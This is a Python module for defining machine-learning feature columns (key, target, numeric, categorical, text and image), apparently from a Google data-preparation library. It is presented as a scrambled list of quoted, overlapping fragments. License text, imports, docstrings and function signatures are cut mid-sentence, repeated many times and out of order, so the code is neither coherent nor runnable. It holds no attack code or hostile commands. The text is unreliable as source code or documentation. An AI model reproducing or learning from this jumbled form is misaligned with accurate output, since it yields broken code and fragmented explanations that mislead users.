Returns: An instance of ImageFeatureColumn. \"\"\" return ImageFeatureColumn(name,", "a categorical or discrete value column within a feature. Args: name: Name of", "frequency_threshold: Frequency threshold below which words are not added to the vocab. split_regex:", "or discrete value column within a feature. Args: name: Name of feature column.", "the vocabulary/ngrams. split_regex: Regex rule to split text stop_words: Either list or set,", "Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0", "is described in terms of features. This module provides functionality to define those", "data transformations to apply to produce those features. \"\"\" from _features import CategoricalFeatureColumn", "text should be ignored word2vec_dict: Dictionary of word -> word_vectors. If it is", "image column within a feature.. Args: name: name of image feature default: Default", "specific language governing permissions and # limitations under the License. \"\"\"Classes for defining", "of image feature default: Default value for the column. Returns: An instance of", "default: Default value for the column. log_base: Base of logarithm to be applied.", "under the Apache License, Version 2.0 (the \"License\"); # you may not use", "language governing permissions and # limitations under the License. \"\"\"Classes for defining the", "instance. Args: name: Name of feature column. Returns: An instance of KeyFeatureColumn. \"\"\"", "writing, software # distributed under the License is distributed on an \"AS IS\"", "rule to extract the column value. Defaults to None, which means no splitting.", "You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "be used in training, prediction and evaluation is described in terms of features.", "License. # You may obtain a copy of the License at # #", "and evaluation is described in terms of features. 
This module provides functionality to", "strip_html: Boolean on whether html_markup should be removed before processing removable_tags: list of", "characters of len 1. - Use r'\\w{3,}' to group alphanumerical characters of len", "default=None): \"\"\"Creates an image column within a feature.. Args: name: name of image", "\"\"\"Creates a feature representing the key of the instance. Args: name: Name of", "representing the key of the instance. Args: name: Name of feature column. Returns:", "default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete value", "column within a feature. Args: name: Name of feature column. default: Default value", "compliance with the License. # You may obtain a copy of the License", "frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False,", "stemmed ngrams: number of ngrams the tokenizer should generate (2 for bigrams etc)", "_features import FeatureColumn from _features import FeatureFormat from _features import FeatureMetadata from _features", "import NumericFeatureColumn from _features import TargetFeatureColumn from _features import TextFeatureColumn from _predict import", "label or value of the instance. Args: name: Name of feature column. Returns:", "log_base=0): \"\"\"Creates a numeric column within a feature. Args: name: Name of feature", "frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete value column within a feature. Args:", "for bigrams etc) use_tf_idf: Boolean on whether the BOW representation should be tf*idf", "2016 Google Inc. All Rights Reserved. 
# # Licensed under the Apache License,", "each word frequency_threshold: Frequency threshold below which words/ngrams are not added to the", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "to produce those features. \"\"\" from _features import CategoricalFeatureColumn from _features import Feature", "def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete value column within", "added to the vocab. split_regex: Regex rule to extract the column value. Defaults", "import TargetFeatureColumn from _features import TextFeatureColumn from _predict import FeatureProducer from _registries import", "the column value. Defaults to None, which means no splitting. Examples: - Use", "import Feature from _features import FeatureColumn from _features import FeatureFormat from _features import", "ExampleProtoFormatter from _transforms import FeatureVector def key(name): \"\"\"Creates a feature representing the key", "Either list or set, specifying the stop words to be ignored or a", "- Use r'\\w{1,}' to group alphanumerical characters of len 1. - Use r'\\w{3,}'", "stop words to be ignored or a string representing the language of stopwords", "Default value for the column. frequency_threshold: Frequency threshold below which words are not", "a feature. Args: name: Name of feature column. default: Default value for the", "text value column within a feature. Args: name: Name of feature column. default:", "default: Default value for the column. sampling_percentage: Percentage value (0-100) for the number", "import ImageFeatureColumn from _features import KeyFeatureColumn from _features import NumericFeatureColumn from _features import", "_features import TargetFeatureColumn from _features import TextFeatureColumn from _predict import FeatureProducer from _registries", "not use this file except in compliance with the License. # You may", "to the vocab. 
Returns: An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default,", "TargetFeatureColumn from _features import TextFeatureColumn from _predict import FeatureProducer from _registries import register_analyzer", "\"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing the target label or", "the column. frequency_threshold: Frequency threshold below which words are not added to the", "of feature column. Returns: An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name,", "features. This module provides functionality to define those features, and data transformations to", "for the column. frequency_threshold: Frequency threshold below which words are not added to", "ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value column", "column. frequency_threshold: Frequency threshold below which words are not added to the vocab.", "split_regex: Regex rule to split text stop_words: Either list or set, specifying the", "the data used to train machine learning models. Data to be used in", "License, Version 2.0 (the \"License\"); # you may not use this file except", "the target label or value of the instance. Args: name: Name of feature", "ngrams: number of ngrams the tokenizer should generate (2 for bigrams etc) use_tf_idf:", "use_stemmer: Boolean on whether text should be stemmed ngrams: number of ngrams the", "should generate (2 for bigrams etc) use_tf_idf: Boolean on whether the BOW representation", "alphanumerical characters of len 3. - Use r'\\S+' to group on non-whitespace. Returns:", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "Returns: An instance of CategoricalFeatureColumn. 
\"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name,", "split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None,", "removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image column within a feature..", "whose text should be ignored word2vec_dict: Dictionary of word -> word_vectors. If it", "produce those features. \"\"\" from _features import CategoricalFeatureColumn from _features import Feature from", "not added to the vocab. Returns: An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn(", "used to train machine learning models. Data to be used in training, prediction", "# you may not use this file except in compliance with the License.", "Returns: An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature", "import TextFeatureColumn from _predict import FeatureProducer from _registries import register_analyzer from _registries import", "agreed to in writing, software # distributed under the License is distributed on", "group alphanumerical characters of len 1. - Use r'\\w{3,}' to group alphanumerical characters", "no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should be", "no splitting. Examples: - Use r'\\w{1,}' to group alphanumerical characters of len 1.", "(the \"License\"); # you may not use this file except in compliance with", "# limitations under the License. \"\"\"Classes for defining the data used to train", "Use r'\\w{3,}' to group alphanumerical characters of len 3. 
- Use r'\\S+' to", "# Unless required by applicable law or agreed to in writing, software #", "frequency_threshold=0): \"\"\"Creates a free-form text value column within a feature. Args: name: Name", "learning models. Data to be used in training, prediction and evaluation is described", "feature column. Returns: An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates", "by applicable law or agreed to in writing, software # distributed under the", "default: Default value for the column. frequency_threshold: Frequency threshold below which words are", "threshold below which words/ngrams are not added to the vocab. Returns: An instance", "This module provides functionality to define those features, and data transformations to apply", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "# Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the", "frequency_threshold: Frequency threshold below which words/ngrams are not added to the vocab. Returns:", "image feature default: Default value for the column. 
Returns: An instance of ImageFeatureColumn.", "sampling_percentage: Percentage value (0-100) for the number of rows that should be sampled", "etc) use_tf_idf: Boolean on whether the BOW representation should be tf*idf normalize: Boolean", "sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name,", "stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates", "_features import FeatureFormat from _features import FeatureMetadata from _features import ImageFeatureColumn from _features", "a feature.. Args: name: name of image feature default: Default value for the", "_features import NumericFeatureColumn from _features import TargetFeatureColumn from _features import TextFeatureColumn from _predict", "default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates", "from _predict import FeatureProducer from _registries import register_analyzer from _registries import register_transformer from", "bigrams etc) use_tf_idf: Boolean on whether the BOW representation should be tf*idf normalize:", "name: Name of feature column. Returns: An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name)", "for the column. sampling_percentage: Percentage value (0-100) for the number of rows that", "words/ngrams are not added to the vocab. Returns: An instance of TextFeatureColumn. \"\"\"", "instance of CategoricalFeatureColumn. 
\"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100,", "stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should be stemmed", "Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version", "processing removable_tags: list of html tags whose text should be ignored word2vec_dict: Dictionary", "file except in compliance with the License. # You may obtain a copy", "html tags whose text should be ignored word2vec_dict: Dictionary of word -> word_vectors.", "r'\\w{1,}' to group alphanumerical characters of len 1. - Use r'\\w{3,}' to group", "before processing removable_tags: list of html tags whose text should be ignored word2vec_dict:", "import register_transformer from _transforms import ExampleProtoFormatter from _transforms import FeatureVector def key(name): \"\"\"Creates", "for the specific language governing permissions and # limitations under the License. \"\"\"Classes", "list or set, specifying the stop words to be ignored or a string", "prediction and evaluation is described in terms of features. This module provides functionality", "_features import KeyFeatureColumn from _features import NumericFeatureColumn from _features import TargetFeatureColumn from _features", "a string representing the language of stopwords to be requested from nltk. Use", "the vocab. Returns: An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage,", "License for the specific language governing permissions and # limitations under the License.", "value for the column. log_base: Base of logarithm to be applied. 
Returns: An", "L2 norm) strip_html: Boolean on whether html_markup should be removed before processing removable_tags:", "frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image column within a feature.. Args: name:", "feature representing the target label or value of the instance. Args: name: Name", "\"\"\"Classes for defining the data used to train machine learning models. Data to", "to in writing, software # distributed under the License is distributed on an", "the number of rows that should be sampled for constructing the vocabulary/ngrams. split_regex:", "whether html_markup should be removed before processing removable_tags: list of html tags whose", "numeric column within a feature. Args: name: Name of feature column. default: Default", "under the License. \"\"\"Classes for defining the data used to train machine learning", "implied. # See the License for the specific language governing permissions and #", "KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing the target label or value of", "\"License\"); # you may not use this file except in compliance with the", "of stopwords to be requested from nltk. Use [] for no stopwords. For", "Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the \"License\");", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "from _registries import register_analyzer from _registries import register_transformer from _transforms import ExampleProtoFormatter from", "module provides functionality to define those features, and data transformations to apply to", "free-form text value column within a feature. Args: name: Name of feature column.", "on whether the BOW representation should be tf*idf normalize: Boolean on whether sparse", "those features, and data transformations to apply to produce those features. 
\"\"\" from", "Boolean on whether text should be stemmed ngrams: number of ngrams the tokenizer", "added to the vocab. Returns: An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name,", "whether text should be stemmed ngrams: number of ngrams the tokenizer should generate", "not added to the vocab. split_regex: Regex rule to extract the column value.", "(used with L2 norm) strip_html: Boolean on whether html_markup should be removed before", "NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a", "_registries import register_transformer from _transforms import ExampleProtoFormatter from _transforms import FeatureVector def key(name):", "or implied. # See the License for the specific language governing permissions and", "stopwords to be requested from nltk. Use [] for no stopwords. For more", "be replaced with a matrix, one row for each word frequency_threshold: Frequency threshold", "stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text", "Defaults to None, which means no splitting. Examples: - Use r'\\w{1,}' to group", "\"\"\"Creates an image column within a feature.. Args: name: name of image feature", "provides functionality to define those features, and data transformations to apply to produce", "Apache License, Version 2.0 (the \"License\"); # you may not use this file", "a numeric column within a feature. Args: name: Name of feature column. default:", "OR CONDITIONS OF ANY KIND, either express or implied. 
# See the License", "may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "CategoricalFeatureColumn from _features import Feature from _features import FeatureColumn from _features import FeatureFormat", "Name of feature column. default: Default value for the column. sampling_percentage: Percentage value", "word2vec_dict: Dictionary of word -> word_vectors. If it is not empty, then the", "NumericFeatureColumn from _features import TargetFeatureColumn from _features import TextFeatureColumn from _predict import FeatureProducer", "language of stopwords to be requested from nltk. Use [] for no stopwords.", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "in writing, software # distributed under the License is distributed on an \"AS", "feature column. default: Default value for the column. log_base: Base of logarithm to", "normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image column within", "# See the License for the specific language governing permissions and # limitations", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags,", "value (0-100) for the number of rows that should be sampled for constructing", "or value of the instance. Args: name: Name of feature column. 
Returns: An", "normalize: Boolean on whether sparse vector (BOW or tf*idf) should be normalize (used", "import FeatureMetadata from _features import ImageFeatureColumn from _features import KeyFeatureColumn from _features import", "the BOW representation should be tf*idf normalize: Boolean on whether sparse vector (BOW", "numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column within a feature. Args: name: Name", "default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def", "Feature from _features import FeatureColumn from _features import FeatureFormat from _features import FeatureMetadata", "replaced with a matrix, one row for each word frequency_threshold: Frequency threshold below", "Use [] for no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether", "of rows that should be sampled for constructing the vocabulary/ngrams. split_regex: Regex rule", "the Apache License, Version 2.0 (the \"License\"); # you may not use this", "should be stemmed ngrams: number of ngrams the tokenizer should generate (2 for", "word_vectors. If it is not empty, then the words will be replaced with", "Boolean on whether the BOW representation should be tf*idf normalize: Boolean on whether", "you may not use this file except in compliance with the License. #", "import register_analyzer from _registries import register_transformer from _transforms import ExampleProtoFormatter from _transforms import", "from _features import NumericFeatureColumn from _features import TargetFeatureColumn from _features import TextFeatureColumn from", "a feature representing the key of the instance. 
Args: name: Name of feature", "on whether text should be stemmed ngrams: number of ngrams the tokenizer should", "Name of feature column. Returns: An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def", "default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete value column within a feature.", "the instance. Args: name: Name of feature column. Returns: An instance of KeyFeatureColumn.", "to group alphanumerical characters of len 3. - Use r'\\S+' to group on", "column. sampling_percentage: Percentage value (0-100) for the number of rows that should be", "from _features import CategoricalFeatureColumn from _features import Feature from _features import FeatureColumn from", "which words/ngrams are not added to the vocab. Returns: An instance of TextFeatureColumn.", "representation should be tf*idf normalize: Boolean on whether sparse vector (BOW or tf*idf)", "of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}',", "name: name of image feature default: Default value for the column. Returns: An", "return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column within a feature.", "use this file except in compliance with the License. # You may obtain", "Data to be used in training, prediction and evaluation is described in terms", "instance of TargetFeatureColumn. 
\"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric", "word frequency_threshold: Frequency threshold below which words/ngrams are not added to the vocab.", "KeyFeatureColumn from _features import NumericFeatureColumn from _features import TargetFeatureColumn from _features import TextFeatureColumn", "ImageFeatureColumn from _features import KeyFeatureColumn from _features import NumericFeatureColumn from _features import TargetFeatureColumn", "should be sampled for constructing the vocabulary/ngrams. split_regex: Regex rule to split text", "alphanumerical characters of len 1. - Use r'\\w{3,}' to group alphanumerical characters of", "list of html tags whose text should be ignored word2vec_dict: Dictionary of word", "# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may", "a matrix, one row for each word frequency_threshold: Frequency threshold below which words/ngrams", "from _registries import register_transformer from _transforms import ExampleProtoFormatter from _transforms import FeatureVector def", "instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None):", "_transforms import ExampleProtoFormatter from _transforms import FeatureVector def key(name): \"\"\"Creates a feature representing", "\"\"\"Creates a numeric column within a feature. Args: name: Name of feature column.", "apply to produce those features. \"\"\" from _features import CategoricalFeatureColumn from _features import", "column within a feature.. 
Args: name: name of image feature default: Default value", "CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False,", "html_markup should be removed before processing removable_tags: list of html tags whose text", "Percentage value (0-100) for the number of rows that should be sampled for", "2.0 (the \"License\"); # you may not use this file except in compliance", "the key of the instance. Args: name: Name of feature column. Returns: An", "return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing the target label or value", "of len 1. - Use r'\\w{3,}' to group alphanumerical characters of len 3.", "- Use r'\\S+' to group on non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\"", "to split text stop_words: Either list or set, specifying the stop words to", "Returns: An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words,", "tf*idf) should be normalize (used with L2 norm) strip_html: Boolean on whether html_markup", "Boolean on whether html_markup should be removed before processing removable_tags: list of html", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the", "import FeatureVector def key(name): \"\"\"Creates a feature representing the key of the instance.", "the words will be replaced with a matrix, one row for each word", "use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value", "representing the language of stopwords to be requested from nltk. Use [] for", "logarithm to be applied. Returns: An instance of NumericFeatureColumn. 
\"\"\" return NumericFeatureColumn(name, default=default,", "from _features import TextFeatureColumn from _predict import FeatureProducer from _registries import register_analyzer from", "register_analyzer from _registries import register_transformer from _transforms import ExampleProtoFormatter from _transforms import FeatureVector", "means no splitting. Examples: - Use r'\\w{1,}' to group alphanumerical characters of len", "of feature column. default: Default value for the column. frequency_threshold: Frequency threshold below", "Regex rule to split text stop_words: Either list or set, specifying the stop", "the column. log_base: Base of logarithm to be applied. Returns: An instance of", "Default value for the column. sampling_percentage: Percentage value (0-100) for the number of", "# # Unless required by applicable law or agreed to in writing, software", "training, prediction and evaluation is described in terms of features. This module provides", "on non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex)", "to be ignored or a string representing the language of stopwords to be", "express or implied. # See the License for the specific language governing permissions", "for each word frequency_threshold: Frequency threshold below which words/ngrams are not added to", "more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should be stemmed ngrams: number", "below which words/ngrams are not added to the vocab. Returns: An instance of", "value column within a feature. Args: name: Name of feature column. default: Default", "text stop_words: Either list or set, specifying the stop words to be ignored", "rule to split text stop_words: Either list or set, specifying the stop words", "string representing the language of stopwords to be requested from nltk. Use []", "from nltk. Use [] for no stopwords. 
For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean", "feature.. Args: name: name of image feature default: Default value for the column.", "words will be replaced with a matrix, one row for each word frequency_threshold:", "either express or implied. # See the License for the specific language governing", "vocab. Returns: An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex,", "\"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html,", "applied. Returns: An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name,", "Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams,", "NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete", "vector (BOW or tf*idf) should be normalize (used with L2 norm) strip_html: Boolean", "to define those features, and data transformations to apply to produce those features.", "is not empty, then the words will be replaced with a matrix, one", "be normalize (used with L2 norm) strip_html: Boolean on whether html_markup should be", "split_regex=None): r\"\"\"Creates a categorical or discrete value column within a feature. 
Args: name:", "word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image column within a feature.. Args:", "info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should be stemmed ngrams: number of", "from _features import ImageFeatureColumn from _features import KeyFeatureColumn from _features import NumericFeatureColumn from", "threshold below which words are not added to the vocab. split_regex: Regex rule", "the License. # You may obtain a copy of the License at #", "strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image column within a", "with L2 norm) strip_html: Boolean on whether html_markup should be removed before processing", "features. \"\"\" from _features import CategoricalFeatureColumn from _features import Feature from _features import", "feature column. default: Default value for the column. frequency_threshold: Frequency threshold below which", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "from _features import Feature from _features import FeatureColumn from _features import FeatureFormat from", "None, which means no splitting. Examples: - Use r'\\w{1,}' to group alphanumerical characters", "Use r'\\S+' to group on non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\" return", "import FeatureProducer from _registries import register_analyzer from _registries import register_transformer from _transforms import", "permissions and # limitations under the License. \"\"\"Classes for defining the data used", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "for the column. log_base: Base of logarithm to be applied. 
Returns: An instance", "text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0):", "to None, which means no splitting. Examples: - Use r'\\w{1,}' to group alphanumerical", "will be replaced with a matrix, one row for each word frequency_threshold: Frequency", "log_base: Base of logarithm to be applied. Returns: An instance of NumericFeatureColumn. \"\"\"", "the column. sampling_percentage: Percentage value (0-100) for the number of rows that should", "Examples: - Use r'\\w{1,}' to group alphanumerical characters of len 1. - Use", "and # limitations under the License. \"\"\"Classes for defining the data used to", "_features import ImageFeatureColumn from _features import KeyFeatureColumn from _features import NumericFeatureColumn from _features", "the language of stopwords to be requested from nltk. Use [] for no", "discrete value column within a feature. Args: name: Name of feature column. default:", "from _transforms import ExampleProtoFormatter from _transforms import FeatureVector def key(name): \"\"\"Creates a feature", "import FeatureFormat from _features import FeatureMetadata from _features import ImageFeatureColumn from _features import", "name: Name of feature column. default: Default value for the column. log_base: Base", "import ExampleProtoFormatter from _transforms import FeatureVector def key(name): \"\"\"Creates a feature representing the", "of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column", "with the License. # You may obtain a copy of the License at", "Args: name: Name of feature column. Returns: An instance of KeyFeatureColumn. \"\"\" return", "def key(name): \"\"\"Creates a feature representing the key of the instance. 
Args: name:", "below which words are not added to the vocab. split_regex: Regex rule to", "be requested from nltk. Use [] for no stopwords. For more info nltk.corpus.stopwords.readme()", "for defining the data used to train machine learning models. Data to be", "# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you", "group on non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold,", "vocabulary/ngrams. split_regex: Regex rule to split text stop_words: Either list or set, specifying", "limitations under the License. \"\"\"Classes for defining the data used to train machine", "non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def", "TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize,", "3. - Use r'\\S+' to group on non-whitespace. Returns: An instance of CategoricalFeatureColumn.", "stop_words: Either list or set, specifying the stop words to be ignored or", "KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing the target label", "law or agreed to in writing, software # distributed under the License is", "the License for the specific language governing permissions and # limitations under the", "TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column within a feature. Args:", "are not added to the vocab. 
split_regex: Regex rule to extract the column", "be ignored or a string representing the language of stopwords to be requested", "from _features import FeatureMetadata from _features import ImageFeatureColumn from _features import KeyFeatureColumn from", "or set, specifying the stop words to be ignored or a string representing", "_registries import register_analyzer from _registries import register_transformer from _transforms import ExampleProtoFormatter from _transforms", "len 1. - Use r'\\w{3,}' to group alphanumerical characters of len 3. -", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "features, and data transformations to apply to produce those features. \"\"\" from _features", "Name of feature column. default: Default value for the column. log_base: Base of", "from _features import FeatureColumn from _features import FeatureFormat from _features import FeatureMetadata from", "machine learning models. Data to be used in training, prediction and evaluation is", "image(name, default=None): \"\"\"Creates an image column within a feature.. Args: name: name of", "An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5,", "_transforms import FeatureVector def key(name): \"\"\"Creates a feature representing the key of the", "of len 3. - Use r'\\S+' to group on non-whitespace. Returns: An instance", "column. default: Default value for the column. sampling_percentage: Percentage value (0-100) for the", "value for the column. frequency_threshold: Frequency threshold below which words are not added", "def target(name='target'): \"\"\"Creates a feature representing the target label or value of the", "CategoricalFeatureColumn. 
\"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english',", "-> word_vectors. If it is not empty, then the words will be replaced", "of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf,", "def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None,", "value of the instance. Args: name: Name of feature column. Returns: An instance", "Reserved. # # Licensed under the Apache License, Version 2.0 (the \"License\"); #", "in compliance with the License. # You may obtain a copy of the", "are not added to the vocab. Returns: An instance of TextFeatureColumn. \"\"\" return", "Frequency threshold below which words are not added to the vocab. split_regex: Regex", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "requested from nltk. Use [] for no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer:", "to train machine learning models. Data to be used in training, prediction and", "of the instance. Args: name: Name of feature column. Returns: An instance of", "to be used in training, prediction and evaluation is described in terms of", "\"\"\"Creates a free-form text value column within a feature. Args: name: Name of", "train machine learning models. 
